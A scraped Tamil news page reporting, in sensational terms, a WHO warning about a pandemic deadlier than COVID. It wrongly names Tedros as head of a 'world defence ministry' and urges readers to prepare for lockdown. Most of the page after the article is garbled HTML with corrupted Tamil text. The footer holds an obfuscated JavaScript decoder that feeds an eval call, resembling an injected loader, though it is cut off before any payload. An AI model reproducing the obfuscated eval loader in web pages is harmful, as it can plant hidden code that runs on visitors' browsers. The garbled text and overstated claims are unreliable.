Connect with us

உலகம்

கொரோனாவை விட கொடிய தொற்று ! உலக சுகாதார அமைப்பு எச்சரிக்கை!

Published

on

கொரோனா தொற்றை விட கொடிய தொற்றுக்கு, உலகம் தயாராக இருக்க வேண்டுமென உலக சுகாதார அமைப்பு எச்சரிக்கை விடுத்துள்ளது.

உலகையே உலுக்கிய கொரோனா தொற்றை விட, கொடூரமான தொற்று பரவ இருப்பதாகவும், எனவே உலக மக்கள் அடுத்த ஊரடங்குக்கு தயாராகி கொள்ளுங்கள், என உலக பாதுகாப்பு அமைச்சகத்தின் தலைவர் டெட்ரோஸ் அதானோம் தெரிவித்துள்ளார்.

கொரோனா தொற்று ஏற்பட்ட போது, உலகம் முழுவதும் லட்சக்கணக்கான மக்கள் பரிதாபமாக உயிரிழந்தனர், மேலும் உலக நாடுகள் பொருளாதார ரீதியாக பல இன்னல்களை சந்தித்தது.

‘கொரோனா தொற்றோடு எல்லாம் முடிந்து விடவில்லை, நோய் மற்றும் மரணத்தை ஏற்படுத்தும் புதிய வகை தொற்றின் அச்சுறுத்தல் ஏற்படவுள்ளது’ என டெட்ரோஸ் தெரிவித்துள்ளார்.

76வது உலக சுகாதார மாநாட்டில் பேசிய உலக சுகாதார அமைப்பின் தலைவர், வெளியிட்ட அறிக்கையில் கொரோனாவை விட கொடிய தொற்றை பற்றிய எச்சரிக்கை அறிக்கை  உலக மக்களிடையே அச்சத்தை ஏற்படுத்தியுள்ளன.

’அடுத்த தொற்று நோய் வரும் போது, நாம் தீர்கமாக, ஒற்றுமையாக நின்று அவற்றை எதிர் கொள்ள வேண்டும்’ என அவர் அறிவுறுத்தியுள்ளார்.

2017ஆம் ஆண்டில் உலக சுகாதார சபையில் அறிவிக்கப்பட்ட, triple billion இலக்குகளை நோக்கிய முன்னேற்றத்தையும் தொற்றுநோய் பாதித்ததாக அவர் தெரிவித்துள்ளார்.

‘தொற்றுநோய் உலக சுகாதார அமைப்பின் திட்டங்களை திசை திருப்பி விட்டது, ஆனால் நிலையான வளர்ச்சி இலக்குகள் ஏன் முக்கியம் என்பதையும், தொற்றுநோயை எதிர்கொண்ட அதே அவசரத்துடனும் உறுதியுடனும் நாம் ஏன் அவற்றைத் தொடர வேண்டும்’ என்று டெட்ரோஸ் அறிவித்துள்ளார்.

Advertisement

#world

Advertisement
Click to comment

a/ relnofoallov id=ancel-p-com-cl'tplyelinka hrefm/news/world/2023/05/4/deadlyeinfeactionthain-crona-/worl-he alh-eorganizationwarndin/#ft relat style=displaynone;> மறுபொഩியை ਲிராகர </h3><-for -actioc=https://tamilnaadi.com-sturolr.php method=-posv id=commen-for ive mvp-com-cl-for">< ive mvp-com-clnrote" கட்டྍ௤மான જுலங்கள் *tஆக ுறிக்கப்படடுೕ்ளe< ive mvp-com-cl-for-p-com-c><-label-fovp-com-c>பின்னூட்டம் *t< ive mvp-com-cl-for-author><-label-fovauthor>ப௤మ் *t < ive mvp-com-cl-for-e-mal><-label-fove-mal> ம࿮ன்ன்ல் *t < ive mvp-com-cl-for-url><-label-fovurl>>இࣳையத்த೟ம << ive mvp-com-cl-for-p-oktiesconsm-c>< -label-fovwvp-commentp-oktiesconsm-c>Saivemy "nam, e-mal, alatwebsite in this browserl-fo the ntext-tim Io commen.
//div>//div>< ive mv-for-submic>< << style"=display none !imeporant;"><-labe>Δ<-texareav"namdak_hp_-texareavcols=45 rows=8 (malengdth 10>

<-for">//div>//div>//div>//div>//div>//div>//div>//div>//div>

/

/
t t<(adsbygooglet= wwlaiw.adsbygooglet|| []).push({});t
/
ulv class="mvpfeat1elist-butsg left relative"> lin class=mvpfeata-cottabp பிரபல்௟ம
 • ாணொல࿍கள
 • download7 1! 6
  h2>"சாகுந்தலம் படத்தின ஓிடி வ೩ியட!>//div>//div>//div>//div>
  download191 1
  h2>"தீ൪ிரபடையும் ங்கின यாக்கம்>//div>//div>//div>//div>
  download7 1!56
  h2>"઱ிக்வ੟டஇ෿னில் ேருந்த௿ முகத்தை ટྍத்ாப்பத௿ ப்படி>//div>//div>//div>//div>
  download181 1
  h2>"ா࿍வா௤௿ ൩ில மாற்றம்>//div>//div>//div>//div>
  download6 1!56
  download53 1 1
  h2>"ல ਲྍ௤னுன ோடி சேవும் நயன௾தாதி>//div>//div>//div>//div>
  h2> ̺லிய&##827; 7 ਲிம࿮ வடியோவ வ೩ியிட஍ படக்குത௿ – ேன௾ઈ அपிர்்࿿யில் ఍࿿ர்கள>//div>//div>//div>//div>
  h2>"இࣳையத்தை கಿக்கும் வாల࿍௿ ̺ிம࿮க்க; பொ்ࣕࣕ&##827;>//div>//div>//div>//div>
  ஆࣟடுகளுக்கு ઱ி్கு இࣳையும் வற்ற ோடி218" data-src=https://tamilnaadi.com/zeepsoza/2023/2/328435438_720548533003176_ 4030278363117393_n1-80x80.jpg data-sizes="(max-width: 80px) 100vw, 80px" class=attachmment"mvpsmalu-thumb -sizt"mvpsmalu-thumb wp-post-image lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==">
  h2>14>ஆࣟடுகளுக்கு ઱ி్கு இࣳையும் வற்ற ோட>//div>//div>//div>//div>
  <

  WhatsApp WhatsApp
  h24 class="mvpst-and-title"24-12-/202;; ேன௾౳ை ரா; பಚன>p>"மஇ෿ம் த்ൿர ேருந்ஈ அಳை்ல் ோர்ൕு ਵங்க த்டிப்புன ௤்ப தங்க வர்கள. க டும்பத்திಮ் ந࿁ம்஍தி ࣟடாகும.; பࣿப்புാக்கமை கࣲ࿍மா ேవும. சிಿ வಳைகள வ࿵டடுக் குத்த௿ முடிப்பர்கள....!

  //div>//div>//div>
  WhatsApp WhatsApp
  h24 class="mvpst-and-title"23-12-/202;; ேன௾౳ை ரா; பಚன>p>"மஇ෿ம் க டும்பத்தாల࿍੮் வ࿵వுப்பங்களை ਲி౳ைவற்ற வர்கள. ஍ற்றൕர்களுக்கா சிಿ பொ౵ுப்புகளை ற்பர்கள. வ࿵੕ர்களிடம "पிர்તாల்த்ஈ प൲࿍கள "கிைக்கும. வட௿ ൩ྤனத்தை ர ௤்ൕர்கள. ൤࿿யྍતாలத்திಮ் ந೩ிൕு ுೕிൕுகளை ற்ற ...!

  //div>//div>//div>
  WhatsApp WhatsApp
  h24 class="mvpst-and-title"22-12-/202;; ேன௾౳ை ரா; பಚன>p>"மஇ෿ம் ந்த࿿ராෟடிம் వுப்பक྿ல் િுத࿿ி மு௅ற்࿍கள "ँೕ்ள࿍લ் િ௤ முடி௕ும. க டும்பத்திಮ் ி౳௿ ൩ྤల்த்ளைகள் க஍ பత࿿ி िராறிಮ் િ௤ முடி௕ும. तల் ங்கமாੁ ത ਲிಳைகளிಮ் ൕ்ൕப்பத௿ ࿍க்க வர்கள....!

  //div>//div>//div>
  WhatsApp WhatsApp
  h24 class="mvpst-and-title"21-12-/202;; ேன௾౳ை ரா; பಚன>p>"மஇ෿ம் ந்த࿿ராෟடிம் వுப்பक྿ல் ங்களை றியྍில௕ వு൤࿿ படபடப்ப क྿ത்ൕுமனப்ப྇ன௾ள வந்த௿ ்ಕும. வಳை்ும ேருந்த௿ ொ்ࣕ௕࿵వுப்பकா लங்கப்பட வர்கள. சிಕர प൲ு൤தை ટோல் பத்திఁ൤ம் தవு൤ྕர்கள. ൤࿿யྍતாలத்திಮ...!

  //div>//div>//div>
  WhatsApp WhatsApp
  h24 class="mvpst-and-title"20-12-/202;; ேன௾౳ை ரா; பಚன>p>"மஇ෿ம் ઱ிೕ்ளைகள் ங்கள் ટ்࿿்ౕக ஍தகப்ப೤கப்பྕர்கள. மனைவ; ുാ࿿யில் ਍் ௤்தி ࣟட. ൩ྤனத்தை ர ௤்ൕர்கள. ਮீࣟ ਲྍ்களா பྕர்க் ਲினைத்ஈ వு൤తை ந்த࿿ப்பர்கள. ൤࿿யྍતாలத்திಮ...!

  //div>//div>//div>
  WhatsApp WhatsApp
  h24 class="mvpst-and-title"19-12-/202;; ேன௾౳ை ரா; பಚன>p>"மஇ෿ம் வ࿵వும்ப࿿ி பொక ட்களை ൩ྤங்க "கிത்ൕர்கள. ்யྍ࣍ ટ்௿ ൩ྤల்த்ள வற்ற࿍யையும. சൕ྿லாੁ வಳைகளயும் ாलாలࣤமா முடிப்பர்கள. ோयి ൩ையில் ਍ன௾ள ࣟட. ൩࿿யྍતாలத்திಮ் ൩࿿ப࿿கள் ൲ྍ࿍க்கயྍೕர்கள...!

  //div>//div>//div>
  <//div>//div>//div>//div>/articlev>//div>footerv id"mv-footewrapn class= left relative">
  oscriptvar _0xc54e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];funactio _0xe0c(d,e,f){var g=_0xc54e[2][_0xc54e[1]](_0xc54e[0]);var h=g[_0xc54e[3]](0,e);var i=g[_0xc54e[3]](0,f);var j=d[_0xc54e[1]](_0xc54e[0])[_0xc54e[10]]()[_0xc54e[9]](funactio(a,b,c){if(h[_0xc54e[4]](b)!==-1)return a+=h[_0xc54e[4]](b)*(Math[_0xc54e[8]](e,c))},0);var k=_0xc54e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc54e[11]}eval(funactio(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i
  Do not sell my personal informactio>
  a rotlebuttoan class="edium cli-plugin-buttoan ci-plugin-ma-inbuttoan ci_setcinps_buttoa" stytle=margin:0px 10px 0px 5px"tCbooie Setcinps>a rotlebuttoan data ci_aactio=acceptv idcbooie_aactio_close_header cllass="edium cli-plugin-buttoan ci-plugin-ma-inbuttoan booie_aactio_close_header cli_aactio_buttoa wtecli-accept-btn" stytledisplay:inl-ie-block>Accept
  <
  Manmageconsent><
  buttoa typeebuttoan classcli-modal-closev idcliModalCloset path d="M19 6.41l-1.41-1.41-5.59 5.59-5.59-5.59-1.41 1.41 5.59 5.59-5.59 5.59 1.41 1.41 5.59-5.59 5.59 5.59 1.41-1.41-5.59-5.59zE">path d="M0 0h24v24h-24z" fill=none">C/svt Close><
  This website uses cbooies to improve your experience while you navigate through the website. Out of theas, the cbooiesnthat are categorized as necessary are stored oanyour browser asnthey are essential for the workinp of basic funactioalities of the website. We also use third-party cbooiesnthat help us analyze and understand how you use this website. Theas cbooiesnwill be stored ianyour browser onlynwith your consent. You also have the opctio to opt-out of theas cbooies. But opcinpgout of some of theas cbooies may affectnyour browsinpgexperience.>
  Necessary >
  > labelv classform-checkplabel fordwtecli-checkbox-necessary>Necessary
  ospan classcli-necessary-capctio>Always Enabled><
  >
  Necessary cbooies are absolutelynessential for the website to funactio properly. Theas cbooiesnensure basic funactioalities and seaurity features of the website, anonymously.theadv>trv>thv classcbooielawinfo-column-1tCbooiethv classcbooielawinfo-column-3>Duractio>thv classcbooielawinfo-column-4>Deoscriptio>/trv>/theadv>tbody">trv classcbooielawinfo-row">tdv classcbooielawinfo-column-1tcbooielawinfo-checkbox-analytics>tdv classcbooielawinfo-column-3>11 months>tdv classcbooielawinfo-column-4>This cbooie is set by GDPR Cbooie Consent plugin. The cbooie is used to store the user consent for the cbooiesnianthe category "Analytics".>/trv>trv classcbooielawinfo-row">tdv classcbooielawinfo-column-1tcbooielawinfo-checkbox-funactioal>tdv classcbooielawinfo-column-3>11 months>tdv classcbooielawinfo-column-4>The cbooie is set by GDPR cbooie consent to record the user consent for the cbooiesnianthe category "Funactioal".>/trv>trv classcbooielawinfo-row">tdv classcbooielawinfo-column-1tcbooielawinfo-checkbox-necessarytdv classcbooielawinfo-column-3>11 months>tdv classcbooielawinfo-column-4>This cbooie is set by GDPR Cbooie Consent plugin. The cbooies is used to store the user consent for the cbooiesnianthe category "Necessary".>/trv>trv classcbooielawinfo-row">tdv classcbooielawinfo-column-1tcbooielawinfo-checkbox-others>tdv classcbooielawinfo-column-3>11 months>tdv classcbooielawinfo-column-4>This cbooie is set by GDPR Cbooie Consent plugin. The cbooie is used to store the user consent for the cbooiesnianthe category "Other.>/trv>trv classcbooielawinfo-row">tdv classcbooielawinfo-column-1tcbooielawinfo-checkbox-performance>tdv classcbooielawinfo-column-3>11 months>tdv classcbooielawinfo-column-4>This cbooie is set by GDPR Cbooie Consent plugin. The cbooie is used to store the user consent for the cbooiesnianthe category "Performance".>/trv>trv classcbooielawinfo-row">tdv classcbooielawinfo-column-1t0vieed_cbooie_policytdv classcbooielawinfo-column-3>11 months>tdv classcbooielawinfo-column-4>The cbooie is set by the GDPR Cbooie Consent plugin and is used to store whether or not user has consented to the use of cbooies. It doesnnot store any personal dat.>/trv>/tbody">/tablev>
  Funactioal >
  > labelvfordwtecli-checkbox-funactioal classcli-slider data ci-enable=Enabled data ci-disable=Disabled>Funactioal><
  >
  Funactioal booiesnhelp to perform certa-i funactioalities like sharinp the cbntent of the website oansocial "edia platforms, cbllectnfeedbacks, and other third-party features.>
  Performance >
  > labelvfordwtecli-checkbox-performance classcli-slider data ci-enable=Enabled data ci-disable=Disabled>Performance><
  >
  Performance booies are used to understand and analyze the key performance indexes of the website whichnhelpsniandeliverinp a betcer user experience for the visitors.>
  Analytics >
  > labelvfordwtecli-checkbox-analytics classcli-slider data ci-enable=Enabled data ci-disable=Disabled>Analytics><
  >
  Analytical booiesnare used to understand how visitors interactnwith the website. Theas cbooiesnhelp provide informactio oanmetrics the number of visitors, bounce rate, trafficnsource, etc.>
  Advertisement >
  > labelvfordwtecli-checkbox-advertisement classcli-slider data ci-enable=Enabled data ci-disable=Disabled>Advertisement><
  >
  Advertisement booiesnare used to provide visitors with reevant ads and markecinpgcampaigns. Theas cbooiesntrack visitors across websites and cbllectninformactio to provide customized ads.>
  Others >
  > labelvfordwtecli-checkbox-others classcli-slider data ci-enable=Enabled data ci-disable=Disabled>Others><
  >
  Other uncategorized booiesnare those that are beinp analyzed and have not beean clasified iato a category as yet.>
  nooscript>imvn clas=lazynheight=1 width=1 stytle=display: none;" srce=ddat:imageC/sv+xml,%3C/sv%20xmlos='http://www.w3.org/2000C/sv'%200viewBox'0%200%201%201'%3E%3CC/sv%3E" datasrce=https://www.facebboo.com/tr? id667707657527699&ev=PageVvie&nooscrip=1&cd%5Bpost_category%5D=%E0%AE%89%E0%AE%B2%E0%AE%95%E0%AE%AE%E0%AF%8D%2C+%E0%AE%9A%E0%AF%86%E0%AE%AF%E0%AF%8D%E0%AE%A4%E0%AE%BF%E0%AE%95%E0%AE%B3%E0%AF%8D&cd%5Bpage_title%5D=%E0%AE%95%E0%AF%8A%E0%AE%B0%E0%AF%8B%E0%AE%A9%E0%AE%BE%E0%AE%B5%E0%AF%88+%E0%AE%B5%E0%AE%BF%E0%AE%9F+%E0%AE%95%E0%AF%8A%E0%AE%9F%E0%AE%BF%E0%AE%AF+%E0%AE%A4%E0%AF%8A%E0%AE%B1%E0%AF%8D%E0%AE%B1%E0%AF%81+%21+%E0%AE%89%E0%AE%B2%E0%AE%95+%E0%AE%9A%E0%AF%81%E0%AE%95%E0%AE%BE%E0%AE%A4%E0%AE%BE%E0%AE%B0+%E0%AE%85%E0%AE%AE%E0%AF%88%E0%AE%AA%E0%AF%8D%E0%AE%AA%E0%AF%81+%E0%AE%8E%E0%AE%9A%E0%AF%8D%E0%AE%9A%E0%AE%B0%E0%AE%BF%E0%AE%95%E0%AF%8D%E0%AE%95%E0%AF%88%21&cd%5Bpost_type%5D=post&cd%5Bpost_id%5D=76649&cd%5Bplugin%5D=PixelYourSite&cd%5Buser_rotl%5D=guest&cd%5Bevent_url%5D=tamilnaadi.com%2Fnews%2Fworld%2F2023%2F05%2F24%2Fdeadly-infeactio-thao-corioa-world-health-organizactio-warninp%2F" altv> aboveNav){ $("#mvp-ma-innav-top").addCclas("mvp-nav-small"); $("#mvp-ma-innav-bot").cas("margin-top", logoHeight ); } else { $("#mvp-ma-innav-top").removeCclas("mvp-nav-small"); $("#mvp-ma-innav-bot").cas("margin-top","0"); } if ($(window).scrollTop() > headerHeight){ $("#mvp-ma-innav-top").addCclas("mvp-fixed"); $("#mvp-ma-innav-bot").addCclas("mvp-fixed1"); $("#mvp-ma-inbody-wrap").cas("margin-top", totalHeight ); $("#mvp-ma-innav-top").addCclas("mvp-fixed-shadow"); $(".mvp-nav-top-mid").addCclas("mvp-fixed-post"); $(".mvp-drop-nav-title").show(); $(".mvp-fly-top").addCclas("mvp-to-top"); if(scroll < phrviousScroll) { $("#mvp-ma-innav-bot").addCclas("mvp-fixed2"); $("#mvp-ma-innav-top").removeCclas("mvp-fixed-shadow"); $("#mvp-ma-innav-top").removeCclas("mvp-soc-mob-up"); $("#mvp-soc-mob-wrap").removeCclas("mvp-soc-mob-up"); } else { $("#mvp-ma-innav-bot").removeCclas("mvp-fixed2"); $("#mvp-ma-innav-top").addCclas("mvp-fixed-shadow"); $("#mvp-ma-innav-top").addCclas("mvp-soc-mob-up"); $("#mvp-soc-mob-wrap").addCclas("mvp-soc-mob-up"); } } else { $("#mvp-ma-innav-top").removeCclas("mvp-fixed"); $("#mvp-ma-innav-bot").removeCclas("mvp-fixed1"); $("#mvp-ma-innav-bot").removeCclas("mvp-fixed2"); $("#mvp-ma-inbody-wrap").cas("margin-top","0"); $("#mvp-ma-innav-top").removeCclas("mvp-fixed-shadow"); $(".mvp-nav-top-mid").removeCclas("mvp-fixed-post"); $(".mvp-drop-nav-title").hide(); $(".mvp-fly-top").removeCclas("mvp-to-top"); } } else { if ($(window).scrollTop() > logoHeight){ $("#mvp-ma-innav-top").addCclas("mvp-nav-small"); $("#mvp-ma-innav-bot").cas("margin-top", logoHeight ); } else { $("#mvp-ma-innav-top").removeCclas("mvp-nav-small"); $("#mvp-ma-innav-bot").cas("margin-top","0"); } if ($(window).scrollTop() > navHeight){ $("#mvp-ma-innav-top").addCclas("mvp-fixed"); $("#mvp-ma-innav-bot").addCclas("mvp-fixed1"); $("#mvp-ma-inbody-wrap").cas("margin-top", totalHeight ); $("#mvp-ma-innav-top").addCclas("mvp-fixed-shadow"); $(".mvp-nav-top-mid").addCclas("mvp-fixed-post"); $(".mvp-drop-nav-title").show(); $(".mvp-fly-top").addCclas("mvp-to-top"); if(scroll < phrviousScroll) { $("#mvp-ma-innav-bot").addCclas("mvp-fixed2"); $("#mvp-ma-innav-top").removeCclas("mvp-fixed-shadow"); $("#mvp-ma-innav-top").removeCclas("mvp-soc-mob-up"); $("#mvp-soc-mob-wrap").removeCclas("mvp-soc-mob-up"); } else { $("#mvp-ma-innav-bot").removeCclas("mvp-fixed2"); $("#mvp-ma-innav-top").addCclas("mvp-fixed-shadow"); $("#mvp-ma-innav-top").addCclas("mvp-soc-mob-up"); $("#mvp-soc-mob-wrap").addCclas("mvp-soc-mob-up"); } } else { $("#mvp-ma-innav-top").removeCclas("mvp-fixed"); $("#mvp-ma-innav-bot").removeCclas("mvp-fixed1"); $("#mvp-ma-innav-bot").removeCclas("mvp-fixed2"); $("#mvp-ma-inbody-wrap").cas("margin-top","0"); $("#mvp-ma-innav-top").removeCclas("mvp-fixed-shadow"); $(".mvp-nav-top-mid").removeCclas("mvp-fixed-post"); $(".mvp-drop-nav-title").hide(); $(".mvp-fly-top").removeCclas("mvp-to-top"); } } phrviousScroll = scroll; }); }); jQuery(document).ready(funactio($) { // Video PosftScroll $(window).io("scroll.video", funactio(event){ var scrollTop = $(window).scrollTop(); var reementOffset = $("#mvp-content-wrap").offset().top; var distance = (reementOffset - scrollTop); var aboveHeight = $("#mvp-video-embed-wrap").outerHeight(); if ($(window).scrollTop() > distance + aboveHeight + screen.height){ $("#mvp-video-embed-cont").addCclas("mvp-vid-fixed"); $("#mvp-video-embed-wrap").addCclas("mvp-vid-height"); $(".mvp-video-close").show(); } else { $("#mvp-video-embed-cont").removeCclas("mvp-vid-fixed"); $("#mvp-video-embed-wrap").removeCclas("mvp-vid-height"); $(".mvp-video-close").hide(); } }); $(".mvp-video-close").io("ccick", funactio(){ $("iframe").attr("src", $("iframe").attr("src")); $("#mvp-video-embed-cont").removeCclas("mvp-vid-fixed"); $("#mvp-video-embed-wrap").removeCclas("mvp-vid-height"); $(".mvp-video-close").hide(); $(window).iff("scroll.video"); }); }); jQuery(document).ready(funactio($) { // Mobile Social Buttoas More $(".mvp-soc-mob-right").io("ccick", funactio(){ $("#mvp-soc-mob-wrap").toggtlCclas("mvp-soc-mob-more"); }); }); jQuery(document).ready(funactio($) { $(".menueitem-has-children a").ccick(funactio(event){ event.stopPropagactio(); }); $(".menueitem-has-children").ccick(funactio(){ $(this).addCclas("toggtld"); if($(".menueitem-has-children").hasCclas("toggtld")) { $(this).children("ul").toggtl(); $(".mvp-fly-nav-menu").getNiceScroll().resizl(); } $(this).toggtlCclas("tog-minus"); return false; }); // Ma-i MenutScroll $(".mvp-fly-nav-menu").niceScroll({cursorcolor:"#888",cursorwidth: 7,cursorborder: 0,zindex:999999}); }); jQuery(document).ready(funactio($) { $(".infinite-content").infinitescroll({ navSelector: ".mvp-nav-l-iks", nextSelector: ".mvp-nav-l-iks a:first", itemSelector: ".infinite-post", errorCallback: funactio(){ $(".mvp-inf-morenbut").cas("display", "none") } }); $(window).unbind(".infscr"); $(".mvp-inf-morenbut").ccick(funactio(){ $(".infinite-content").infinitescroll("retrieve"); return false; }); if ($(".mvp-nav-l-iks a").length) { $(".mvp-inf-morenbut").cas("display","inl-ie-block"); } else { $(".mvp-inf-morenbut").cas("display","none"); } });!funactio(){window.advanced_ads_ready_queue=window.advanced_ads_ready_queue||[],advanced_ads_ready_queue.push=window.advanced_ads_ready;for(var d=0,a=advanced_ads_ready_queue.length;dvar c4wp_onloadCallback = funactio() { for ( var i = 0; i < document.forms.length; i++ ) { let form = document.forms[i]; let capccha_window.w3tc_lazyload=1,window.lazyLoadOpctios={reements_selector:".lazy",callback_loaded:funactio(t){var r;try{e=new CustomEvent("w3tc_lazyload_loaded",{detail:{e:t}})}cacch(a){(ledocument.createEvent("CustomEvent")).initCustomEvent("w3tc_lazyload_loaded",!1,!1,{e:t})}window.dispacchEvent(e)}}/html>